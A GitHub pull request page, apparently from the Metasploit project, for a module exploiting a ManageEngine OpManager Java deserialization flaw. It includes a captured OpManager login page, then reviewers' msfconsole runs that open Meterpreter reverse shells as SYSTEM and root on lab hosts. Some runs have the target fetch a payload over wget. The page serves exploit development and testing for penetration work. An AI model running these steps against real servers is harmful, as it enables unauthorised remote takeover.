						<h4 class='browserNotSupportClass'><img src='/apiclient/fluidicv2/img/ie_issue.png' class='ie_issue' /> Issue: <span class='info'>Your browser version is outdated.</span></h4> 
						<h4 class='compatibilityModeClass'><img src='/apiclient/fluidicv2/img/ie_issue.png' class='ie_issue' /> Issue: <span class='info'>Your Internet Explorer is running in compatibility mode 9 or below.</span></h4> 
						<h4 class='browserNotSupportClass' style='margin-top:25px'><img src='/apiclient/fluidicv2/img/ie_solution.png' class='ie_solution' /> Solution: <span class='info'>OpManager only supports Internet Explorer version 10 and above. Kindly update your browser.</span></h4>
						<h4 class='compatibilityModeClass' style='margin-top:25px'><img src='/apiclient/fluidicv2/img/ie_solution.png' class='ie_solution' /> Steps to resolve this issue:</h4>
						<ul>
							<li class='compatibilityModeClass'>In Internet Explorer, select '<b>Tools</b>' from the menu or click on the '<b>Tools</b>' icon.</li>
							<li class='compatibilityModeClass'>Select '<b>Compatibility View settings</b>'.</li>
							<li class='compatibilityModeClass'>Uncheck '<b>Display intranet sites in Compatibility View</b>' option.</li>
						</ul>
					</div>
					<div class='part3'>
						<h4>Please contact support for further assistance.</h4>
						<div class='unable2StartPhone'>
							<img src='/apiclient/fluidicv2/img/phone.png'>
							<b>Phone:</b>
							<span>044-67447070 / 71817070</span>
						</div>
						<div class='unable2StartEmail'>
							<img src='/apiclient/fluidicv2/img/mail.png'>
							<b>Email:</b>
							<span>[email protected]</span>
						</div>
					</div>
				</div>
			</div>
		</div>
</div>
</body>
<script LANGUAGE="JavaScript">
ntlmAuth();
function ntlmAuth()
{
	if(ntlm)
	{
		document.loginForm.ntlmv2.value = "true";
		document.loginForm.j_username.value = ntlmuser;
		document.loginForm.submit();
	}
}
function selectADLogin()
{
	document.loginForm.AUTHRULE_NAME.value="ADAuthenticator"; //No I18N
	$('#domainNameDiv').attr({
		name:'domainName', //No I18N
		value:document.loginForm.domainNameAD.value
	});
}

function selectLocalLogin()
{

	//var placeholder = document.loginForm.domainNameAD.value;
	if(document.loginForm.domainNameAD === undefined || document.loginForm.domainNameAD.value === undefined || document.loginForm.domainNameAD.value === "Authenticator")
	{
		document.loginForm.AUTHRULE_NAME.value="Authenticator"; //No I18N
		$('#domainNameDiv').removeAttr('name value'); //No I18N
	//	placeholder ="Local Authentication";
	}
	else if(document.loginForm.domainNameAD.value == "radiusUserLogin")
	{
		document.loginForm.AUTHRULE_NAME.value="RadiusAuthenticator"; //No I18N
	//	placeholder ='Radius Authentication';
		$('#domainNameDiv').removeAttr('name value'); //No I18N
	}
	else 
	{
		selectADLogin();
	}
	//	 placeholder = placeholder+' '+'User Name';
		//$('#userName').attr('placeholder',placeholder);//No I18N
}
detectOSnBrowser();
function detectOSnBrowser(){
	var OSName='unkown_OS';//No I18N
	if(navigator.appVersion.indexOf('Win')!=-1){OSName='Windows';}//No I18N
	if(navigator.appVersion.indexOf('Mac')!=-1){OSName='MacOS';}//No I18N
	if(navigator.appVersion.indexOf('X11')!=-1){OSName='UNIX';}//No I18N
	if(navigator.appVersion.indexOf('Linux')!=-1){OSName='Linux';}//No I18N
	$('body').addClass(OSName);

	var browserName='unkown_Browser';//No I18N
	if(/Chrome/.test(navigator.userAgent) && /Google Inc/.test(navigator.vendor)){browserName='chrome';}//No I18N
	if(/Safari/.test(navigator.userAgent) && /Apple Computer/.test(navigator.vendor)){browserName='safari';}//No I18N
	if(navigator.userAgent.indexOf('Opera')!=-1){browserName='opera';}//No I18N
	if(navigator.userAgent.indexOf('Firefox')!=-1){browserName='firefox';}//No I18N
	if((navigator.userAgent.indexOf('MSIE')!=-1)||(!!document.documentMode==true)){browserName='ie';}//No I18N
	$('body').addClass(browserName);

	if(navigator.userAgent.match(/Trident.*rv:11\./)){$('body').addClass('ie11');}//No I18N
}
WindowHtWd();
function WindowHtWd(){
	var wHt=$(window).height();
	if(wHt<='939' && $('.eventbanner').offset()!==undefined){
		var topPos='-'+$('.eventbanner').offset().top+'px';//No I18N
		$('.eventbanner').css({top:topPos});
	}
}
</script>
</html>


<script type="text/javascript">

//ignorei18n_start
$(document).ready(function()
{
	if($('#domainDiv').length==1){
		$('#LoginDiv').addClass('domainField');
	}

	$('.select2').select2({minimumResultsForSearch:-1});
	var ieDetails = IeVersionCheck();
	if (ieDetails.IsIE && ieDetails.TrueVersion < 10) {
		if(ieDetails.TrueVersion <= 7) {
			$('body').addClass('ie7');
		}
		doIEHandling(true);
    } else if (ieDetails.IsIE && ieDetails.CompatibilityMode && ieDetails.ActingVersion < 10) {
		doIEHandling(true, true);
		if(ieDetails.ActingVersion <= 7) {
			$('body').addClass('ie7');
		}
    } else {
		doIEHandling(false);
	var loginAdsContent = "";
	var loginPagingContent=""
	var cnt=1;
	var scrWidth = 0;
	var play;
	var language = "";
	language = '';
	//collect images path from ZOHO Creator
	
		/*	var scrWidth = document.body.scrollWidth;
			if(scrWidth < 1400)
			document.body.className = "loginBody2"

			// $('#btnSubmit').click(function() {
			// 	loginSubmit();
			// });

			$('div.sliderClosebt').hover(
			  function () {
				$(this).show();
				$('div.sliderClosebtTxt').show();
			  },
			  function () {

			  }
			);

			$('div.sliderClosebtTxt').hover(
			  function () {
				$(this).show();
				$('div.sliderClosebt').show();
			  },
			  function () {

			  }
			);

			$('div.sliderClosebt.selected').hover(
			  function () {
				$(this).show();
				$('div.sliderClosebt').show();
			  },
			  function () {

			  }
			);

			$('#folio_block').hover(
			  function () {
				$('div.sliderClosebt').show();
				$('div.sliderClosebtTxt').show();
			  },
			  function () {
				$('div.sliderClosebt').hide();
				$('div.sliderClosebtTxt').hide();
			  }
			);

			$('#opmDftLogo1').hover(
			  function () {
				  if(cnt>1)
				  {
					$('div.sliderClosebt').show();
					$('div.sliderClosebtTxt').show();
				  }
			  },
			  function () {
				if(cnt>1)
				{
					$('div.sliderClosebt').hide();
					$('div.sliderClosebtTxt').hide();
				}
			  }
			);


			jQuery('div.folio_block').hoverIntent({
					over: makeCloseBtShow,
					timeout: 500,
					out: makeCloseBtHide
				});
*/
			
			 	loadCredentialsFromCookie();
			 
			//userType();

			//Message box show and hide
			// $('.loginCloseicon').click(function(){
			// 	$(".loginMsgBox").slideUp(400);
			// });

			/* $('#frmTleRightlinksclick').click(function(){
			 	$(".loginMsgBox").slideDown(400);
			 	$("#errorDiv").hide();
			 });*/
			
			 $('#frmTleRightlinksclick').click(function(){
			 	$("#loginFirst").slideDown(1000);
			 	$("#userName").val("admin");
			 	$("#password").val("admin");
			 	$("select[name=domainNameAD]").val("NULL");
			 	$("input[name=authType]").val("localUserLogin");
			 	$("#errorDiv").hide();
		/*	 	document.getElementById('password').type = 'password';
			 	setOpacityInputPwd();
			 	setOpacityInputUser();*/
			 });
			
		}
			
	/*var default_Domain = '';//No I18N		
	$('#authenticationDiv select[name="domainNameAD"]').select2().val(default_Domain)//.trigger('change'); //No I18N	
	$('#authenticationDiv select[name="domainNameAD"]').select2();
	*/	
});
//Start Slider close button show hide
function makeCloseBtShow()
{
$("#sliderClosebt").show();
}
function makeCloseBtHide()
{
$("#sliderClosebt").hide();
}
// Start Close Slider Image
function closeSliderImage()
{
	if ($("#folio_block").css('display') == 'block')
	{
		clearInterval(play); //Stop the rotation
		$("#opmDftLogo1").show();
		$("#folio_block").hide();
		$('.loginPaging').hide();
		//$('#sliderClosebt').hide();
		//$('div.hdrMnuUnSelectBG.selected').removeClass('selected');//No I18N
		$('div.sliderClosebt').addClass('selected');                  //No I18N
		$('div.sliderClosebtTxt').html('webclient.loginpage.show.ad');
		$.ajax({
		 url: "/LoginPage.do",			//No I18N
	  	 data: "ShowAds=false",
		 cache: false,
		 success: function(response) {
	       }
	});
	}
	else
	{
		$("#opmDftLogo1").hide();
		$("#folio_block").show();
		$('.loginPaging').show();

		$('div.sliderClosebt.selected').removeClass('selected');//No I18N
		//$('div.sliderClosebt').addClass('sliderClosebt');
		$('div.sliderClosebtTxt').html('webclient.loginpage.close.ad');
		//clearInterval(play); //Stop the rotation
		//rotate(); //Trigger rotation immediately
		//rotateSwitch(); // Resume rotation
		$.ajax({
		 url: "/LoginPage.do",			//No I18N
	  	 data: "ShowAds=true",
		 cache: false,
		 success: function(response) {
	       }
	});

	}

}

//Start Slider loading JS function
function loadSliderImage()
{
	$("#loader").hide();

	$(".loginPaging").show();
	$(".loginPaging a:first").addClass("active");

	var imageWidth = $(".window1").width();
	var imageSum = $(".image_reel img").size();
	var imageReelWidth = imageWidth * imageSum;

	$(".image_reel").css({'width' : imageReelWidth});

//Paging + Slider Function
	rotate = function(){
		var triggerID = $active.attr("rel") - 1; //Get number of times to slide
		var image_reelPosition = triggerID * imageWidth; //Determines the distance the image reel needs to slide

		$(".loginPaging a").removeClass('active'); //Remove all active class
		$active.addClass('active'); //Add active class (the $active is declared in the rotateSwitch function)

//Slider Animation
		$(".image_reel").animate({
			right: -image_reelPosition
		}, 500 );

	};

//Rotation + Timing Event
	rotateSwitch = function()
	{
		play = setInterval(function(){ //Set timer - this will repeat itself every 3 seconds
			$active = $('.loginPaging a.active').next();
			if ( $active.length === 0) { //If paging reaches the end...
			//	$active = $('.loginPaging a:first'); //go back to first
			}
			rotate(); //Trigger the paging and slider function
		}, 10000); //Timer speed in milliseconds (3 seconds)
	};

	rotateSwitch(); //Run function on launch

//On Hover
	$(".image_reel a").hover(function() {
		clearInterval(play); //Stop the rotation
	}, function() {
		rotateSwitch(); //Resume rotation
	});

//On Click
	$(".loginPaging a").click(function() {
		$active = $(this); //Activate the clicked paging
		//Reset Timer
		clearInterval(play); //Stop the rotation
		rotate(); //Trigger rotation immediately
		rotateSwitch(); // Resume rotation
		return false; //Prevent browser jump to link anchor
	});


//customize check box
	$(".checkBox,.checkBoxClear").click(function(srcc)
    {
        if ($(this).hasClass("checkBox"))
        {
            $(this).removeClass("checkBox");
            $(this).addClass("checkBoxClear");
        }
        else
        {
            $(this).removeClass("checkBoxClear");
            $(this).addClass("checkBox");
        }
    });


//Start Setfocus
		$('input:text:first').focus();
		$('input:text').bind("keydown", function(e)
		 {
			var n = $("input:text").length;

			if (e.which == 13)
			{ //Enter key
			  e.preventDefault(); //Skip default behavior of the enter key
			  var nextIndex = $('input:text').index(this) + 1;
				  if(nextIndex < n-1)
				  {
					$('input:text')[nextIndex].focus();
				  }
				  else
				  {
					$('input:text')[nextIndex-1].blur();
					$('#btnSubmit').click();
				  }
			}
		  }); 
}
function IeVersionCheck() {
    var value = {
        IsIE: false,
        TrueVersion: 0,
        ActingVersion: 0,
        CompatibilityMode: false
    };

    //Try to find the Trident version number
    var trident = window.navigator.userAgent.match(/Trident\/(\d+)/);
    if (trident) {
        value.IsIE = true;
        //Convert from the Trident version number to the IE version number
        value.TrueVersion = parseInt(trident[1], 10) + 4;
    }

    //Try to find the MSIE number
    var msie = window.navigator.userAgent.match(/MSIE (\d+)/);
    if (msie) {
        value.IsIE = true;
        //Find the IE version number from the user agent string
        value.ActingVersion = parseInt(msie[1]);
    } else {
        //Must be IE 11 in "edge" mode
        value.ActingVersion = value.TrueVersion;
    }

    //If we have both a Trident and MSIE version number, see if they're different
    if (value.IsIE && value.TrueVersion > 0 && value.ActingVersion > 0) {
        //In compatibility mode if the trident number doesn't match up with the MSIE number
		value.CompatibilityMode = value.TrueVersion != value.ActingVersion;
    }
	return value;
}
//Start Browser checking for IE
function doIEHandling(notSupportedIE, iscompatibilityMode)
{
	var objref = document.getElementById('ie6_statusmsg');
	//if(jQuery.browser.msie && jQuery.browser.version=="6.0")
     if(notSupportedIE)
	 {
		 //jQuery(".loginMsgBox").slideUp(400);
		 //document.getElementById("forgotPassStatus").style.display="block";
		 //document.getElementById("loginHolderdisable").style.display="block";
		 //document.getElementById("authenticationDiv").style.display="none";

		/* document.getElementById("LoginDiv").style.display="none";
		 var posLeft = (document.body.offsetWidth-896)/2;
		 objref.style.left= posLeft+'px';
		 objref.style.top = 30+'px';*/
		//  objref.style.display = 'block';
		// document.body.className = ""
		document.getElementById("form1").style.display = 'none';
		document.getElementById("browserNotSupportDiv").style.display = 'block';
		if(iscompatibilityMode) {
			$('.browserNotSupportClass').hide();
		} else {
			$('.compatibilityModeClass').hide();
		}
	 }
	 else
	 {
		// document.getElementById("form1").style.display = 'block';
		// document.getElementById("authenticationDiv").style.display="block";
		// document.getElementById("forgotPassStatus").style.display="none";

		$('#authenticationDiv').css({left:'0',opacity:'1'});
    	$('#forgotPasswordDiv').css({left:'100%',opacity:'0'});

		//document.getElementById("loginHolderdisable").style.display="none";
		objref.style.display = 'none';
	 }
}
// ignorei18n_end

	setincheckbox();
	selectLocalLogin();


</script>


[*] An HTTP session cookie has been issued
[-] Exploit aborted due to failure: unexpected-reply: Could not identify the remote version number
[*] Exploit completed, but no session was created.
Version 12.5.328 on Windows Server 2019

Powershell Target

msf6 > use exploit/multi/http/opmanager_sumpdu_deserialization
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set rhost 192.168.140.149
rhost => 192.168.140.149
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > options

Module options (exploit/multi/http/opmanager_sumpdu_deserialization):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   CVE        Automatic        yes       Vulnerability to use (Accepted: Automatic, CVE-2020-28653, CVE-
                                         2021-3287)
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.140.149  yes       The target host(s), see https://github.com/rapid7/metasploit-fr
                                         amework/wiki/Using-Metasploit
   RPORT      8060             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be
                                         an address on the local machine or 0.0.0.0 to listen on all add
                                         resses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated
                                         )
   TARGETURI  /                yes       OpManager path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (cmd/windows/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LHOST         192.168.140.1    yes       The listen address (an interface may be specified)
   LOAD_MODULES                   no        A list of powershell modules separated by a comma to downloa
                                            d over the web
   LPORT         4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Command


msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Command
   1   Windows Dropper
   2   Windows PowerShell
   3   Unix Command
   4   Linux Dropper
   5   Python


msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set target 2
target => 2
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] An HTTP session cookie has been issued
[*] Detected version: 12.5.328
[*] The request handler has been associated with the HTTP session
[*] Sending stage (200262 bytes) to 192.168.140.149
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.149:49896) at 2021-09-17 16:30:28 -0500

meterpreter > getuid
Server username: WIN-D4KCH4DS7I8\space
meterpreter > sysinfo
Computer        : WIN-D4KCH4DS7I8
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >

space-r7
space-r7 reviewed Sep 17, 2021
View reviewed changes
documentation/modules/exploit/multi/http/opmanager_sumpdu_deserialization.md
1. Download an affected version for either Windows or Linux from the [archive][0]
1. Run the installer executable as root
1. Accept the default values for all settings (skip registration)
1. Navigate to `/opt/ManageEngine/OpManagerCentral/bin`
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Looks like older Linux versions might be under the /opt/ManageEngine/OpManager/bin path, so that could be added here

@zeroSteiner
Copy link
Contributor Author

For the 12.3.295 on Windows Server 2019 which is failing because it can't identify the version number, you'll have to set it to the 2020 CVE. Unfortunately the version detection uses an aspect of the logon page that isn't present in the older versions. After the CVE option is set, it should work just fine though.

@space-r7
Copy link
Contributor

For the 12.3.295 on Windows Server 2019 which is failing because it can't identify the version number, you'll have to set it to the 2020 CVE. Unfortunately the version detection uses an aspect of the logon page that isn't present in the older versions. After the CVE option is set, it should work just fine though.

That worked great, thanks!

msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set cve CVE-2020-28653
cve => CVE-2020-28653
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] An HTTP session cookie has been issued
[*] The request handler has been associated with the HTTP session
[*] Using URL: http://0.0.0.0:8080/rO59AnzQl4
[*] Local IP: http://192.168.1.199:8080/rO59AnzQl4
[*] Client 192.168.140.135 (Wget/1.20.3 (linux-gnu)) requested /rO59AnzQl4
[*] Sending payload to 192.168.140.135 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3012548 bytes) to 192.168.140.135
[*] Command Stager progress - 135.34% done (157/116 bytes)
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.135:32826) at 2021-09-20 09:01:17 -0500
[*] Server stopped.

meterpreter > getuid
Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 192.168.140.135
OS           : Ubuntu 20.04 (Linux 5.11.0-34-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

space-r7 added a commit that referenced this pull request Sep 20, 2021
@space-r7
Land #15670, add opmanager sumpdu deser module
fee037a
@space-r7 space-r7 merged commit 4bccc05 into rapid7:master Sep 20, 2021
@space-r7
Copy link
Contributor

Added the older path for the Linux installations and fixed a typo in 327aefd. Code looked good to me, and the module worked across a large number of versions (all that I had previously tested after leveraging the CVE option).

@space-r7
Copy link
Contributor

Release Notes

The exploit/multi/http/opmanager_sumpdu_deserialization module implements an exploit (CVE-2020-28653) and patch bypass (CVE-2021-3287) for a Java deserialization vulnerability that exists in numerous versions of ManageEngine's OpManager software. Arbitrary code as the NT AUTHORITY\SYSTEM user on Windows or the root user on Linux is achieved by sending a PDU to the SmartUpdateManager handler.

@zeroSteiner zeroSteiner deleted the feat/cve-2021-3287 branch February 9, 2022 14:17
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@adfoster-r7 adfoster-r7 adfoster-r7 left review comments

@smcintyre-r7 smcintyre-r7 smcintyre-r7 left review comments

@space-r7 space-r7 space-r7 left review comments

Assignees

@space-r7 space-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
5 participants
@zeroSteiner @adfoster-r7 @jmartin-tech @space-r7 @smcintyre-r7